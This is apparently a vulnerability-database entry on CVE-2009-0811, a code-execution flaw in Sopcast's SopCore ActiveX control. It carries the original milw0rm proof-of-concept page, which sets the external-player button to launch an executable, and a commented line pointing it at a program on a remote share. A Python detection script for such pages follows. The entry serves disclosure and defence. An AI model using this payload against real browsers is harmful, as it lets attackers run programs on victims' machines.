Sopcast SopCore Control SetExternalPlayer() Method Arbitrary Code Execution Vulnerability

Vulnerability ID 1117443 Vulnerability type Code injection
Published 2009-03-03 Updated 2009-03-05
CVE ID CVE-2009-0811 CNNVD-ID CNNVD-200903-077
Affected platform Windows CVSS score 9.3
|Vulnerability Sources
https://www.exploit-db.com/exploits/8143
https://cxsecurity.com/issue/WLB-2009030138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-077
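|Vulnerability Details
SopCore is a video playback plug-in; once installed, it lets users watch TvBaby network TV. The SetExternalPlayer() function of the SopCore control does not properly validate the ExternalPlayer property parameter. If a user is tricked into visiting a malicious web page, an arbitrary executable can be associated with the "external player" button. When the user later clicks that button, the file is executed without any prompt.
|Exploit (PoC)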
<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
     user assisted remote code execution poc
     by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
it is possible to associate an arbitrary executable to the "external player"
button (for clarity see http://www.sopcast.com/docs/ where the player
control buttons are shown) which opens Windows Media Player by default.
When the user clicks this button, the executable is launched without prompts.
Also this value is stored in config.xml, inside the sopcast local folder
for further use, e.g. with the sopcast client application.
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2009-03-03]
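
A content-inspection check for the pattern the PoC above relies on, as an added example that is not part of the original advisory or PoC: it flags pages that embed the SopCore CLSID and set the external player path from script, via either SetExternalPlayer() or the ExternalPlayer property. The function name `scan_page`, the sample page and its placeholder paths are constructed for illustration.

```python
import re

# CLSID of the SopCore control, taken from the PoC's <OBJECT> tag.
SOPCORE_CLSID = "8FEFF364-6A5F-4966-A917-A3AC28411659"

# Matches classid=clsid:... with or without quotes/braces, any letter case.
CLSID_RE = re.compile(
    r"classid\s*=\s*[\"']?clsid:\{?" + SOPCORE_CLSID + r"\}?", re.I)

# Method call  .SetExternalPlayer("...")  or property write  .ExternalPlayer = "..."
# Group 1 is the quote character, group 2 the raw JavaScript string body.
CALL_RE = re.compile(
    r"\.\s*(?:SetExternalPlayer\s*\(|ExternalPlayer\s*=)\s*"
    r"([\"'])((?:\\.|(?!\1).)*)\1", re.I | re.S)


def scan_page(html):
    """Return one finding per external-player assignment on a page that
    embeds the SopCore control; an empty list if the CLSID is absent."""
    if not CLSID_RE.search(html):
        return []
    findings = []
    for m in CALL_RE.finditer(html):
        # Simplified JS unescape: handles \\ and \" but not \xNN or \uNNNN.
        path = re.sub(r"\\(.)", r"\1", m.group(2))
        findings.append({
            "line": html.count("\n", 0, m.start()) + 1,
            "path": path,
            # UNC or protocol-relative paths point at a remote host.
            "remote": path.startswith(("\\\\", "//")),
        })
    return findings


# Constructed sample page with placeholder paths (not a captured attack page).
SAMPLE = r'''<html><head><script>
window.onload = function () {
  SopPlayer.InitPlayer();
  SopPlayer.SetExternalPlayer("C:\\EXAMPLE\\placeholder.exe");
  SopPlayer.ExternalPlayer = '\\\\fileserver.example\\share\\placeholder.exe';
};
</script></head><body>
<object id="SopPlayer" classid="clsid:8FEFF364-6A5F-4966-A917-A3AC28411659"></object>
</body></html>'''

if __name__ == "__main__":
    for finding in scan_page(SAMPLE):
        print(finding)
```

The check is purely textual, so it also reports calls that sit in commented-out script lines, and it will miss pages that build the path or the object tag dynamically.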
|References

Source: XF
Name: sopcast-setexternalplayer-code-execution(48955)
Link: http://xforce.iss.net/xforce/xfdb/48955
Source: BID
Name: 33920
Link: http://www.securityfocus.com/bid/33920
Source: BUGTRAQ
Name: 20090226 Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
Link: http://www.securityfocus.com/archive/1/archive/1/501252/100/0/threaded
Source: MISC
Link: http://retrogod.altervista.org/9sg_sopcastia.html